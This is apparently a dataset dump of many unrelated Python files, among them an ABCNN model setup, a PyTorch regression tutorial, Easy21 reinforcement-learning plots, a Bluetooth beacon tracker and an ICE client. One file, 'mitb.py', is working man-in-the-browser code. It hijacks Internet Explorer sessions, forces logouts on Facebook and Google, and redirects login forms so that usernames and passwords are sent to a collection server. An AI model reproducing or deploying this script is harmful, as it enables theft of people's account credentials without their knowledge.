model = Model(embeddings, layers, use_all_layer_outputs, final_size).float()
model.apply(weights_init)
return model
def setup_word_vectors(config):
""" Loads the pre-trained word vectors. The word vector file can be in
Word2Vec or FastText formats.
Args:
config: dict
Contains the information needed to initialize the embeddings
model.
Returns:
word_vectors: KeyedVectors, FastTextKeyedVectors, or None
The pretrained word embeddings. If the embeddings path
is for a pre-trained Word2Vec model, then a KeyedVectors
instance is returned. If the embeddings path is for a
pre-trained FastText model, then a FastTextKeyedVectors
instance is returned. Otherwise, None is returned.
"""
# Get relevant parameters from config file
embeddings_path = config["embeddings"]["path"]
embeddings_format = config["embeddings"]["format"]
is_binary = config["embeddings"]["is_binary"]
# Load pre-trained word embeddings, if possible
if os.path.isfile(embeddings_path):
if embeddings_format == "word2vec":
print("Loading Word2Vec word vectors from: {}".format(embeddings_path))
return KeyedVectors.load_word2vec_format(embeddings_path, binary=is_binary)
elif embeddings_format == "fasttext":
print("Loading FastText word vectors from: {}".format(embeddings_path))
return FastText.load_fasttext_format(embeddings_path).wv
else:
raise EmbeddingsFormatError
return None
def setup_datasets(config):
""" Converts the examples from the datasets into a machine-readable format
useful for training.
To ensure that all words have a word embedding associated to them, we
should have text from ALL datasets (note: this is NOT peeking at the
dataset... this is just to prevent the model from crashing/complaining
when it sees a word that is OOV.) OOV words are assigned random word
embeddings.
Args:
config: dict
Contains the information needed to initialize the datasets.
Returns:
features: dict of string to LongTensor
Maps each dataset name to its tokenized examples.
labels: dict of string to LongTensor
Maps each dataset name to its labels.
word2index: dict of string to int
Maps each word to a unique integer ID.
"""
word2index = {"<PAD>": 0}
question_cols = ["question1", "question2"]
examples = {} # Contains the featurized examples for each dataset
labels = {} # Contains the labels for each dataset
# texts = {} # Contains the parsed text for each dataset
# Process each dataset
max_length = config["max_length"]
data_paths = config["data_paths"]
datasets = {name: pd.read_csv(path) for name, path in data_paths.items()}
for name, dataset in datasets.items():
# Process texts
classes = []
indexed_examples = []
# parsed_texts = []
num_examples = len(dataset)
for index, example in tqdm(dataset.iterrows(), desc=name, total=num_examples):
# Process each question separately
index_map = []
parsed_text = []
for column in question_cols:
# Parse and clean the text
question = example[column]
words = text_to_word_list(question)
words = remove_stop_words(words)
# Convert words to indices
indexes = []
for word in words:
# Update word-index lookup if necessary
if word not in word2index:
word2index[word] = len(word2index)
# Add the word's index to the list
indexes.append(word2index[word])
# Truncate if necessary
length = min(len(indexes), max_length)
indexes = indexes[:length]
words = words[:length]
# Pad if necessary
if length < max_length:
num_padding = max_length - length
indexes.extend([0] * num_padding)
words.extend(["<PAD>"] * num_padding)
# Store parsed text and index tensors
index_map.append(indexes)
# parsed_text.append(words)
# Store processed text and index tensor map and label
classes.append(example["is_duplicate"])
indexed_examples.append(index_map)
# parsed_texts.append(parsed_text)
# Save the processed result
labels[name] = torch.LongTensor(classes)
examples[name] = torch.LongTensor(indexed_examples)
# texts[name] = parsed_texts
return examples, labels, word2index
def setup_embeddings(config, word2index):
""" Creates the embedding matrix using the given word embeddings and mapping
from words to indices.
Args:
config: dict
Contains the information needed to initialize the embeddings.
word2index: dict
Maps words to indices in the embedding matrix.
Returns
embeddings: nn.Embedding
The embedding matrix.
"""
# Initialize random word embeddings
embeddings_size = config["embeddings"]["size"]
embeddings = np.random.uniform(-0.01, 0.01, (len(word2index) + 1, embeddings_size))
embeddings[0] = 0 # Padding is just all 0s
# Replace random vectors with pre-trained vectors if available
word_vectors = setup_word_vectors(config)
if word_vectors:
for word, index in tqdm(word2index.items(), desc="embedding matrix"):
if word in word_vectors:
embeddings[index] = word_vectors[word]
# Convert to nn.Embedding
embeddings = nn.Embedding.from_pretrained(torch.from_numpy(embeddings))
return embeddings
def text_to_word_list(text):
""" Preprocess and convert texts to a list of words. This code was taken
from Elior Cohen's MaLSTM code, which can be found here:
https://github.com/eliorc/Medium/blob/master/MaLSTM.ipynb
Args:
text: string
The text to parse.
Returns:
text: list of string
The parsed text.
"""
text = str(text)
text = text.lower()
# Clean the text
text = re.sub(r"[^A-Za-z0-9^,!.\/'+-=]", " ", text)
text = re.sub(r"what's", "what is ", text)
text = re.sub(r"\'s", " ", text)
text = re.sub(r"\'ve", " have ", text)
text = re.sub(r"can't", "cannot ", text)
text = re.sub(r"n't", " not ", text)
text = re.sub(r"i'm", "i am ", text)
text = re.sub(r"\'re", " are ", text)
text = re.sub(r"\'d", " would ", text)
text = re.sub(r"\'ll", " will ", text)
text = re.sub(r",", " ", text)
text = re.sub(r"\.", " ", text)
text = re.sub(r"!", " ! ", text)
text = re.sub(r"\/", " ", text)
text = re.sub(r"\^", " ^ ", text)
text = re.sub(r"\+", " + ", text)
text = re.sub(r"\-", " - ", text)
text = re.sub(r"\=", " = ", text)
text = re.sub(r"'", " ", text)
text = re.sub(r"(\d+)(k)", r"\g<1>000", text)
text = re.sub(r":", " : ", text)
text = re.sub(r" e g ", " eg ", text)
text = re.sub(r" b g ", " bg ", text)
text = re.sub(r" u s ", " american ", text)
text = re.sub(r"\0s", "0", text)
text = re.sub(r" 9 11 ", "911", text)
text = re.sub(r"e - mail", "email", text)
text = re.sub(r"j k", "jk", text)
text = re.sub(r"\s{2,}", " ", text)
text = text.split()
return text
def remove_stop_words(words):
""" Removes all of the stop words.
Args:
words: list of string
The words in the text.
Returns:
words: list of string
The words in the text with stop words removed.
"""
stops = set(stopwords.words("english"))
return list(filter(lambda w: w not in stops, words))
def setup_layer(max_length, layer_config):
""" Creates a single Layer for the CNN model.
Args:
max_length: int
The maximum length of the input sequences.
layer_config: dict
Contains the information needed to create the layer.
Returns:
layer: Layer module
The desired Layer module.
"""
blocks = []
output_sizes = []
for block_config in layer_config:
block, output_size = setup_block(max_length, block_config)
blocks.append(block)
output_sizes.append(output_size)
layer = CNNLayer(blocks)
layer_size = sum(output_sizes)
return layer, layer_size
def setup_block(max_length, block_config):
""" Creates a single block for the CNN model.
Args:
max_length: int
The maximum length for each sequence/question.
block_config: dict
Contains the information needed to create the block.
Returns:
block: Block module
The desired Block module.
"""
input_size = block_config["input_size"]
output_size = block_config["output_size"]
width = block_config["width"]
dropout_rate = block_config["dropout_rate"]
match_score = block_config["match_score"]
share_weights = block_config["share_weights"]
if block_config["type"] == "bcnn":
conv = Convolution(input_size, output_size, width, 1)
pool = WidthAP(width)
block = BCNNBlock(conv, pool, dropout_rate=dropout_rate)
elif block_config["type"] == "abcnn1":
attn = ABCNN1Attention(input_size, max_length, share_weights, match_score)
conv = Convolution(input_size, output_size, width, 2)
pool = WidthAP(width)
block = ABCNN1Block(attn, conv, pool, dropout_rate=dropout_rate)
elif block_config["type"] == "abcnn2":
conv = Convolution(input_size, output_size, width, 1)
attn = ABCNN2Attention(max_length, width, match_score)
block = ABCNN2Block(conv, attn, dropout_rate=dropout_rate)
elif block_config["type"] == "abcnn3":
attn1 = ABCNN1Attention(input_size, max_length, share_weights, match_score)
conv = Convolution(input_size, output_size, width, 2)
attn2 = ABCNN2Attention(max_length, width, match_score)
block = ABCNN3Block(attn1, conv, attn2, dropout_rate=dropout_rate)
else:
raise BlockTypeError
return block, output_size
def weights_init(m):
""" Initializes the weights for the modules in the CNN model. This function
is applied recursively to all modules in the model via the "apply"
function.
Args:
m: nn.Module
The module to initialize.
Returns:
None
"""
classname = m.__class__.__name__
if classname.find("Conv2d") != -1:
nn.init.xavier_normal_(m.weight)
nn.init.constant_(m.bias, 0)
elif classname.find("Linear") != -1:
nn.init.xavier_normal_(m.weight)
nn.init.constant_(m.bias, 0)
elif classname.find("ABCNN1Attention") != -1:
nn.init.xavier_normal_(m.W1)
nn.init.xavier_normal_(m.W2)
| true |
a567a30ec426443d0f1467432af35094b65873e1 | Python | Reena-Kumari20/Nested_function | /hey.py | UTF-8 | 136 | 2.953125 | 3 | [] | no_license | def outerFunction(text):
def innerFunction():
print(text)
innerFunction()
text="Hey!"
outerFunction(text) | true |
1eaf7444da8cd36660c8d18025e42c612a439cad | Python | a-lchen/bluetoothLE | /beacons.py | UTF-8 | 1,861 | 2.90625 | 3 | [] | no_license | from bluetooth.ble import BeaconService
import triangulate
import pygame
from time import sleep
class Beacon(object):
def __init__(self, data, address):
self._uuid = data[0]
self._major = data[1]
self._minor = data[2]
self._power = data[3]
self._rssi = data[4]
self._address = address
def __str__(self):
ret = "Beacon: address:{ADDR} uuid:{UUID} major:{MAJOR}"\
" minor:{MINOR} txpower:{POWER} rssi:{RSSI}"\
.format(ADDR=self._address, UUID=self._uuid, MAJOR=self._major,
MINOR=self._minor, POWER=self._power, RSSI=self._rssi)
return ret
pygame.init()
screen = pygame.display.set_mode((850,850))
pygame.draw.rect(screen, (255,255,255), (25,25,800,800), 0)
pygame.display.update
def visualize(x,y):
pygame.draw.rect(screen, (255,255,255), (25,25,800,800), 0)
pygame.draw.rect(screen, (0,0,0), (225, 225, 400, 400), 1)
pygame.draw.rect(screen, (0,0,0), ((x*400)+225,(y*400)+225,10,10), 0)
pygame.display.update
pygame.display.flip()
service = BeaconService()
strength_history = []
while True:
devices = service.scan(1)
strengths = []
locs = [(0,0), (1,0)]
for address, data in list(devices.items()):
b = Beacon(data, address)
print(b)
print triangulate.strength_to_length(b._rssi)
strengths.append(b._rssi)
if (len(strengths) != 2):
continue
strength_history.append(strengths)
recent = strength_history[-10:]
best_strengths = []
for i in range(len(strengths)):
best_strengths.append(max([el[i] for el in recent]))
print ("recents = " + str(recent) + " best: "+ str(best_strengths))
loc = triangulate.triangulate(locs, best_strengths)
if loc:
print (loc)
visualize(loc[0],loc[1])
print("Done.")
| true |
f395e40c8b3cb67eb79fdce23b7ee76f528c37a7 | Python | shiyuli/LibTorchDemo | /Python/tutorials/regression.py | UTF-8 | 1,494 | 3.28125 | 3 | [
"MIT"
] | permissive | # encoding: utf-8
# using Python 3.7
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import matplotlib.pyplot as plt
# torch.unsqueeze
x = torch.unsqueeze(torch.linspace(-1, 1, 100), dim=1) # x data (tensor), shape=(100, 1)
y = x.pow(2) + 0.2 * torch.rand(x.size()) # noisy y data (tensor), shape=(100, 1)
x, y = Variable(x), Variable(y)
# plt.scatter(x.data.numpy(), y.data.numpy())
# plt.show()
class Net(torch.nn.Module):
def __init__(self, n_features, n_hidden_layer, n_output):
super(Net, self).__init__()
self.hidden_layer = torch.nn.Linear(n_features, n_hidden_layer)
self.predict_layer = torch.nn.Linear(n_hidden_layer, n_output)
def forward(self, x):
x = F.relu(self.hidden_layer(x))
x = self.predict_layer(x)
return x
net = Net(1, 10, 1)
print(net)
plt.ion() # realtime draw
plt.show()
optimizer = torch.optim.SGD(net.parameters(), lr=0.5) # lr: learning rate
loss_func = torch.nn.MSELoss()
for t in range(100):
prediction = net(x)
loss = loss_func(prediction, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if t % 5 == 0:
# plot and show learning process
plt.cla()
plt.scatter(x.data.numpy(), y.data.numpy())
plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)
plt.text(0.5, 0, 'Loss=%.4f' % loss.data.numpy(), fontdict={'size': 20, 'color': 'red'})
plt.pause(0.1)
plt.ioff()
plt.show()
| true |
c400bfbae61d270014f8c788652f062952098a0e | Python | paulemms/Easy21Silver | /plots.py | UTF-8 | 4,745 | 2.84375 | 3 | [] | no_license | import pdb
import sys
import numpy as np
import matplotlib.pyplot as pyplot
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.cm as cm
import mc
import td
import fa
import environment as env
def standard_plots(num_episodes=100000):
"""Plots of the value function and optimal policy for each algorithm"""
# algorithms
mc_model = plot_value_policy(mc.monte_carlo(num_episodes))
sarsa0_model = plot_value_policy(td.sarsa0(num_episodes))
sarsa_model = plot_value_policy(td.sarsa(num_episodes, la=0.5))
lfa_model = plot_value_policy(fa.lfa(num_episodes, la=0.0))
def plot_sarsa_lambda_mse(alg, title, num_episodes=10000):
"""
Plot the MSE using SARSA with lambda = {0, 0.1, 0,2, ..., 1}
:param int num_episodes: Number of episodes for each SARSA run
"""
pyplot.figure()
lambdas = np.arange(0, 11) / 10
print('Calculating exact solution using monte-carlo')
exact_model = mc.monte_carlo(num_episodes=100000)
exact_q = exact_model.final_q
mse = list()
for la in lambdas:
np.random.seed(100) # fix same random sequence for each model
print(f'Training SARSA({la})')
model = alg(num_episodes=num_episodes, la=la)
err = np.square(model.final_q - exact_q).mean()
mse.append(err)
pyplot.plot(lambdas, mse, 'o-')
pyplot.xlabel("lambda")
pyplot.ylabel("MSE")
pyplot.title(title + f" after {num_episodes:d} episodes")
pyplot.show()
def plot_mse_episode(alg, title, lambdas, num_episodes=10000):
"""
Plot the MSE using SARSA for each given lambda
:param list[float] lambdas: list of lambda values
:param int num_episodes: Number of episodes for each SARSA run
"""
pyplot.figure()
print('Calculating exact solution using monte-carlo ...')
exact_model = mc.monte_carlo(num_episodes=100000)
exact_q = exact_model.final_q
for la in lambdas:
print(f'Training SARSA({la})')
np.random.seed(100) # fix same random sequence for each model
model = alg(num_episodes=num_episodes, la=la, exact_q=exact_q)
pyplot.plot(model.df['Episode'], model.df['MSE'], 'o-', label='Lambda=' + str(la))
pyplot.xlabel("Episode number")
pyplot.ylabel("MSE")
pyplot.legend()
pyplot.title(title + " per episode")
pyplot.show()
def plot_value_policy(model):
"""
Plot value function and policy given the q-function
:param Model model: Trained model object
"""
v = np.max(model.final_q[1:, 1:], axis=2)
pi = np.argmax(model.final_q[1:, 1:], axis=2)
# two plots side by side
fig = pyplot.figure(figsize=(14, 8))
ax1 = fig.add_subplot(122, projection='3d')
ax2 = fig.add_subplot(121)
# plot value function
ax1.set_title("Value Function")
ax1.set_xlabel("Player Sum")
ax1.set_ylabel("First Dealer Card")
ax1.set_zlabel("V")
# Make grid offset by one to reflect card values
x = np.arange(1, v.shape[1] + 1)
y = np.arange(1, v.shape[0] + 1)
x, y = np.meshgrid(x, y)
ax1.plot_surface(x, y, v, cmap=cm.coolwarm, linewidth=0, antialiased=False)
ax1.azim = -140
ax1.elev = 20
# plot policy
ax2.set_title("Optimal Policy")
ax2.set_xlabel("Player Sum")
ax2.set_ylabel("First Dealer Card")
centers = [1, pi.shape[1], 1, pi.shape[0]]
dx, = np.diff(centers[:2]) / (pi.shape[1] - 1)
dy, = -np.diff(centers[2:]) / (pi.shape[0] - 1)
extent = [centers[0] - dx / 2, centers[1] + dx / 2, centers[2] + dy / 2, centers[3] - dy / 2]
ax2.imshow(pi, cmap='tab10', interpolation='nearest', extent=extent)
ax2.set_xticks(np.arange(1, pi.shape[1] + 1, dtype=np.int))
pyplot.show()
def plot_rewards_dist(e, pi, reward_text='winning'):
reward_dict = {'losing': -1, 'winning': 1, 'drawing': 0}
reward = reward_dict[reward_text]
fig = pyplot.figure()
ax = fig.add_subplot(111)
ax.set_title(f"Probability of {reward_text} given policy and initial state")
ax.set_xlabel("First Player Card")
ax.set_ylabel("First Dealer Card")
arr_dist = e.reward_dist(pi, reward=reward)
arr = arr_dist[1:, 1:]
centers = [1, arr.shape[1], 1, arr.shape[0]]
dx, = np.diff(centers[:2]) / (arr.shape[1] - 1)
dy, = -np.diff(centers[2:]) / (arr.shape[0] - 1)
extent = [centers[0] - dx / 2, centers[1] + dx / 2, centers[2] + dy / 2, centers[3] - dy / 2]
img = ax.imshow(arr, interpolation='nearest', extent=extent) # shows first array dimension as row
ax.set_xticks(np.arange(1, arr.shape[1] + 1, dtype=np.int))
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.1)
pyplot.colorbar(img, cax=cax)
pyplot.show()
return np.mean(arr)
| true |
f65598b25c1834869e7cdba471dd52bd39069465 | Python | vucalur/ICE-Sample | /client.py | UTF-8 | 3,592 | 2.71875 | 3 | [] | no_license | #!/usr/bin/python
import sys, traceback, Ice
Ice.loadSlice("./slice/MiddlewareTestbed.ice")
import MiddlewareTestbed
from MiddlewareTestbed import *
owned = {}
def performCustomItemOperation(item):
if item.ice_isA("::MiddlewareTestbed::ItemA"):
# void actionA(float a, out long b);
item = MiddlewareTestbed.ItemAPrx.uncheckedCast(item)
print("Recognised item A. Insert a float");
print '>',
line = str(raw_input()).split(' ')[0]
a = float(line)
print(item.ice_ids())
print(item.ice_id())
b = item.actionA(a)
print("Invocation returned (out param) b: " + str(b))
elif item.ice_isA("::MiddlewareTestbed::ItemB"):
# float actionB(string a);
item = MiddlewareTestbed.ItemBPrx.uncheckedCast(item)
print("Recognised item B. Insert a string")
print '>',
line = str(raw_input())
f = item.actionB(line)
print("Invocation returned value: " + str(f))
elif item.ice_isA("::MiddlewareTestbed::ItemC"):
# void actionC(long aIn, out long aOut, out short b);
item = MiddlewareTestbed.ItemCPrx.uncheckedCast(item)
print("Recognised item C. Insert a long");
print '>',
aIn = long(str(raw_input()).split(' ')[0])
aOut, b = item.actionC(aIn)
print("Invocation returned (out param) a: " + str(aOut) + ", (out param) b: " + str(b))
else:
print("Unsupported dynamic type")
def performAction(item):
print("Available actions: getName(n), getAge(a), performAction(p)")
line = ''
while (line != None):
print '>',
line = str(raw_input());
if line.startswith("n"):
print('item name: ' + item.getName())
elif line.startswith("a"):
print('item age: ' + str(item.getItemAge()))
elif line.startswith("p"):
performCustomItemOperation(item)
else:
print("Unknown command. Try again")
continue
return
def run(factory):
print("Available commands: listOwned(o), action(a) <name>, create(c) <type> <name>, take(t) <name>, release(r) <name>\nTo quit: ^C")
line = ''
while (line != None):
print '>',
line = str(raw_input());
if line.startswith("o"):
for name in owned.keys():
print(name)
elif line.startswith("a "):
try:
name = line.split(' ')[1]
if not name in owned:
print("You don't own item " + name)
else:
try:
performAction(owned[name])
except Exception as deatail:
print('Technical problem encountered: ', deatail)
except IndexError:
print('to few arguments')
elif line.startswith("c "):
try:
typee, name = line.split(' ')[1], line.split(' ')[2]
try:
factory.createItem(name, typee)
except ItemAlreadyExists as e:
print(e)
except IndexError:
print('to few arguments')
elif line.startswith("t "):
try:
name = line.split(' ')[1]
try:
item = factory.takeItem(name)
owned[name] = item
except (ItemNotExists, ItemBusy) as e:
print(e)
except IndexError:
print('to few arguments')
elif line.startswith("r "):
try:
name = line.split(' ')[1]
try:
factory.releaseItem(name)
del owned[name]
except ItemNotExists as e:
print(e)
except IndexError:
print('to few arguments')
else:
print("Unknown command. Try again")
status = 0
ic = None
try:
ic = Ice.initialize(sys.argv)
base = ic.propertyToProxy("AFactory.Proxy")
factory = MiddlewareTestbed.AFactoryPrx.checkedCast(base)
if not factory:
raise RuntimeError("Invalid proxy")
run(factory)
except KeyboardInterrupt:
print('\nQuiting...')
except:
traceback.print_exc()
status = 1
if ic:
# Clean up
try:
ic.destroy()
except:
traceback.print_exc()
status = 1
sys.exit(status)
| true |
b9bd672dd4337852c0a1982d64791eed40571269 | Python | Viktoria-payture/Geekbrains | /Lesson03/Task01.py | UTF-8 | 683 | 4.28125 | 4 | [] | no_license | """
Реализовать функцию, принимающую два числа (позиционные аргументы) и выполняющую их деление.
Числа запрашивать у пользователя, предусмотреть обработку ситуации деления на ноль.
"""
def splitting(a, b):
try:
return a / b
except ZeroDivisionError:
return "Нельзя делить на ноль!"
first_number = int(input("Введите первое число: "))
second_number = int(input("Введите второе число: "))
print(splitting(first_number, second_number))
| true |
352210e470d673a16ae8c33a28d4742d106ba25f | Python | sinemsahn/pythondepo | /blackhat/9_fun_with_internet_explorer/mitb.py | UTF-8 | 4,717 | 2.578125 | 3 | [] | no_license | import win32com.client
import time
import urlparse
import urllib
data_receiver = "http://localhost:8080/" # kimlik bilgilerini hedef sitelerimizden alacak web sunucusu olarak tanimliyoruz
target_sites = {} # hedef isteler sozlugu
target_sites["www.facebook.com"] = {"logout_url" : None, # bir kullaniciyi oturumu kapatmaya zorlamak icin bir get istegi raciligiyla yeniden yonlendirebilecegimiz bir urldir
"logout_form" : "logout_form", # oturumu kapatmaya zorlayan gonderebilecegimiz bir dom ogesidir.
"login_form_index": 0, # degistirecegimiz giris formunu iceren hedef etki alaninin domsindeki gorei konumdur
"owned" : False} # bu da hedef isteden kimlik bilgilerini zaten alip almadigimizi cunku onlari tekrar tekrar zorlarsak bu sfer kullanici suphelenir
target_sites["accounts.google.com"] = {"logout_url" : "https://accounts.google.com/Logout?hl=en&continue=https://accounts.google.com/ServiceLogin%3Fservice%3Dmail",
"logout_form" : None,
"login_form_index" : 0,
"owned" : False}
def wait_for_browser(browser):
# wait for the browser to finish loading a page sayfa tamamen yuklenmesi icin bekler
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
# use the same target for multiple Gmail domains
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
clsid='{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
windows = win32com.client.Dispatch(clsid) #internet explorer sinif nesnesi ile suanda calisan tum internet explorer sekmelerine ve orneklerine erismemizi saglayan com nesnesini baslatiriz. bunlar destek yapisiydi main loopa bakalim
while True:
for browser in windows: # bu kimlik bilgilerini almak istedigimiz siteler icin hedefimizin tarayici oturumunu izledigmizi birincil dongumuzdur. suanda calisan internet explorer nesnelerini yineleyrek basliyoruz bu modern iedeki aktif sekmeleri icerir.
url = urlparse.urlparse(browser.LocationUrl)
if url.hostname in target_sites: # hedefin onceden tanimlanmis sitelerimizden birini ziyaret ettigini kesfedersek, saldirimizin ana mantigini baslatabiliriz.
if target_sites[url.hostname]["owned"]: # ilk adim once bu siteye saldiri yapip yapmadigimizi belirlemektir.eger once yaptiysak onu simdi yapmayiz bunu bir dezavantaji vardir kullanici bilgileirni yanlis girmisse bunu yanlis almis oluruz.
continue
# if there is a URL, we can just redirect
if target_sites[url.hostname]["logout_url"]:#hedef sitenin yonlendirebilecegimz basit bir cikis url'si olup olmadigini gormek icin test ederiz ve eger oyleyse tarayiciyi bunu yapmaya zorlariz
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
# retrieve all elements in the document hedef site facebook gibi kullanicinin oturumu kapatmaya zorlamak icin bir form gondermesini gerektiriyorsa, DOM uzerinde yinelemeye baslariz ve
full_doc = browser.Document.all
# iterate, looking for the logout form cikis formuna kayitli html ogesi kimligini kesfettigimizde formu gonderilmeye zorlamak
for i in full_doc:
try:
# find the logout form and submit it
if i.id == target_sites[url.hostname]["logout_form"]:
i.submit()
wait_for_browser(browser)
except:
pass
# now we modify the login form kullanici giris formuna yonlendirdikten sonra kullanici adi ve parolayi kontrol ettigimiz bir sunucuya gondermek icin formun bitis noktasini degistiriyoruz ve ardindan kullancinin bir giris yapmasini bekleriz
try:
login_index = target_sites[url.hostname]["login_form_index"]
login_page = urllib.quote(browser.LocationUrl)
browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
target_sites[url.hostname]["owned"] = True
# hedef sitemizin ana bilgisayar adini ,kimlik bilgilerini toplayan http sunucumuzun url'sini sonuna ekleriz dikkat et. bu http sunucumuzun kimlik bilgilerini topladiktan sonra tarayicinin hangi siteye yeniden yonlendirilecegini bilmesidir.
except:
pass
time.sleep(5)
# yukarida olan wait_for_browser fonksyionu bir tarayicnin yeni bir sayfaya gitmek veya bir sayfanin tamamen yulenmesini beklemek gibi bir islemi tmamalamasini bekelyen baist bir fonksiyondur. | true |
4804e6b49aab943ed10217e3ce963adcbbca8f44 | Python | dvill03/final-project-fourdudebros | /frontend/Sarcix/scripts/test_print_a_run.py | UTF-8 | 557 | 3.34375 | 3 | [] | no_license | # Program extracting all columns, row names and scores in Python script.
# All this does is read each row/column pair and the related score.
# This will be integrated into loading the database.
import xlrd
loc = ("[insert path to this file]/analysis_530_firstpage.xlsx")
wb = xlrd.open_workbook(loc)
sheet = wb.sheet_by_index(0)
# For row 0 and column 0
# sheet.cell_value(0, 0)
for i in range(1, sheet.nrows):
for j in range(1, sheet.ncols):
print sheet.cell_value(0,j) + " " + sheet.cell_value(i, 0) + " " + str(sheet.cell_value(i, j))
| true |
ca039de2e871db354e606c84ff05f2ac63507047 | Python | SamIAm10/Bulk-Email-Sender | /src/emailer.py | UTF-8 | 861 | 3.015625 | 3 | [] | no_license | import yagmail
# enter the Gmail you are sending from
sender_email = "testemail6213@gmail.com"
# enter the names and emails you are sending to
recipients = [
('Name1', 'testemail6213@gmail.com', 'Position1')
('Name2', 'testemail5354@gmail.com', 'Position2')
]
# enter the filepaths of the files you want to attach (must prefix with "r")
files = [
r'Bulk-Email-Sender\src\test\test_file.txt',
r'Bulk-Email-Sender\src\test\test_image.jpg'
]
email = yagmail.SMTP(sender_email)
# edit your email here
for r in recipients:
email.send(
to = r[1],
# edit your title here
subject = f'Regarding position {r[2]}',
# edit your message here
contents = [f'Hello {r[0]},\n\n I am reaching out in regards to the position of {r[2]}. I hope you will consider me.\n\n Sincerely, first_name last_name'],
attachments = files
) | true |
bd7ce1443ffd8e2ae60faaa3d36bc91d954bc5c5 | Python | ArsenPetrosyanAPK/Homework.GitHub | /Lesson7.py | UTF-8 | 1,617 | 3.6875 | 4 | [] | no_license | #a = input('Please enter firt number: ')
#b = input('(+), (-), (*), (/): ')
#c = input('Please enter second number')
#if b == ('+'):
# print(int(a) + int(c))
#if b == ('-'):
# print(int(a) - int(c))
#if b == ('*'):
# print(int(a) * int(c))
#if b == ('/'):
# print(int(a) / int(c))
#import sys
#x = (5)
#print(sys.getsizeof(x))
#a = 10
#b = 10
#if b > a:
# print('b is big')
#elif a > b:
# print('a is big')
#else:
# print('a iss big')
#country = input('Which is the biggest peoples country in the world? ')
#if country == 'China' or country == 'china':
# print('you are right')
#else:
# print('its a wrong answer ')
#import random
#zar_1 = random.randint(1,6)
#zar_2 = random.randint(1,6)
#my_zar_1 = random.randint(1,6)
#my_zar_2 = random.randint(1,6)
#myresult = zar_1 + zar_2
#compresult = my_zar_1 + my_zar_2
#if myresult > compresult:
# print('You win')
#elif myresult < compresult:
# print("Computer Win")
#else:
# myresult == compresult
# print("no one is win")
#year = int(input("please enter a year"))
#if year % 400 == 0:
# print('February', year, 'has 29 days, .')
#elif year % 100 == 0 and year % 400 == 0:
# print('February', year, 'has 29 days.')
#else:
# print('February', year, 'has 28 days.')
#sxal
#god = int(input('Tari'))
#if god % 4 != 0 or god % 100 == 0 and god % 400 != 0:
# print(god,"nahanj tari chi")
#else:
# print(god, ' nahanj tari e')
#inputov kam random qani tarekan 70 ic mec te poqr
#import random as ran
#x = ran.randint(1,50)
#y = int(input('How old are you? '))
#if y > 18 and y <= 25:
# print('you are enjoyed ')
#else:
# print('You are not accept ')
| true |
4637c3f8ce8acbb576ec0410d151c59be01cfca6 | Python | InsaneLoafer/HogwartsLG4_ZT | /assignments/python_practice/first_practice/fight_game/game_fun.py | UTF-8 | 1,195 | 4.0625 | 4 | [] | no_license | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2020/10/21 10:52
# @Author : ZhangTao
# @File : game_fun.py
import random
def game_fight(enemy_hp, enemy_power):
# 定义4个变量,分别为玩家血量/攻击力,敌人血量/攻击力
my_hp = 1000
my_power = 200
# 打印敌人的血量及攻击力
print(f'敌人的血量为{enemy_hp},敌人的攻击力为{enemy_power}')
# 定义最终血量的计算方式
while True:
my_hp -= enemy_power
enemy_hp -= my_power
print(my_hp)
#判断输赢
if my_hp <= 0:
print(f"我的血量是{my_hp}:敌人血量{enemy_hp}我输了!")
break
elif enemy_hp <= 0:
print(f"我的血量{my_hp}:敌人血量{enemy_hp}我赢了")
break
if __name__ == '__main__':
# 利用列表推导式生成血量
hp = [x for x in range(910, 1001)]
# print(hp, type(hp)) #打印hp及其类型
#让敌人从hp列表中随机选取一个血量
enemy_hp = random.choice(hp)
#随机生成敌人的攻击力
enemy_power = random.randint(100,201)
#调用函数
game_fight(enemy_hp, enemy_power) | true |
a84638c76bef54c5247b6690162681942490c739 | Python | dtbinh/Mocad-1 | /SCI/Simulateur/particles/Particle.py | UTF-8 | 1,373 | 2.671875 | 3 | [] | no_license | import random
from Simulateur.core.Agent import Agent
colors = ['black','red','blue','green','cyan', 'yellow', 'magenta']
colorIndex = 0
class Particle(Agent):
def __init__(self, _env, _sma):
global colors
global colorIndex
newColor = colors[colorIndex]
colorIndex += 1
if colorIndex >= len(colors):
colorIndex = 0
Agent.__init__(self, _env, _sma, newColor, "circle")
dir = random.randint(0,7)
self.pasX, self.pasY = Agent.mooreNeiStep[dir]
def decide(self):
newPosX, newPosY = self.env.getNextCoord(self.posX, self.posY,self.pasX, self.pasY)
if newPosX == -1:
if newPosY == -1:
self.demiTourXY()
else:
self.demiTourX()
elif newPosY == -1:
self.demiTourY()
elif self.env.agTab[newPosX][newPosY] is not None:
self.exchangeDir(self.env.agTab[newPosX][newPosY])
else:
self.move(self.posX, self.posY, newPosX, newPosY)
def demiTourXY(self):
self.pasX = -self.pasX
self.pasY = -self.pasY
def demiTourX(self):
self.pasX = -self.pasX
def demiTourY(self):
self.pasY = -self.pasY
def exchangeDir(self, ag):
tempX = self.pasX
tempY = self.pasY
self.pasX = ag.pasX
self.pasY = ag.pasY
ag.pasX = tempX
ag.pasY = tempY
def move(self, oldX, oldY, newPosX, newPosY):
self.env.agTab[oldX][oldY] = None
self.env.put(self, newPosX, newPosY)
self.posX = newPosX
self.posY = newPosY | true |
d93b4f14e57a0c69cb9b4f6775057a7e34812671 | Python | yashwanth033/competitive_Programming | /competitive programming/Week1/Day1/HighestProductOfThree.py | UTF-8 | 906 | 3.375 | 3 | [] | no_license | def highest_product_of_3(input_ints):
if len(input_ints) < 3:
raise ValueError('Not enough numbers in list')
high = max(input_ints[0], input_ints[1])
low = min(input_ints[0], input_ints[1])
hp_of_2 = input_ints[0] * input_ints[1]
lp_of_2 = input_ints[0] * input_ints[1]
hp_of_3 = input_ints[0] * input_ints[1] * input_ints[2]
for i in range(2, len(input_ints)):
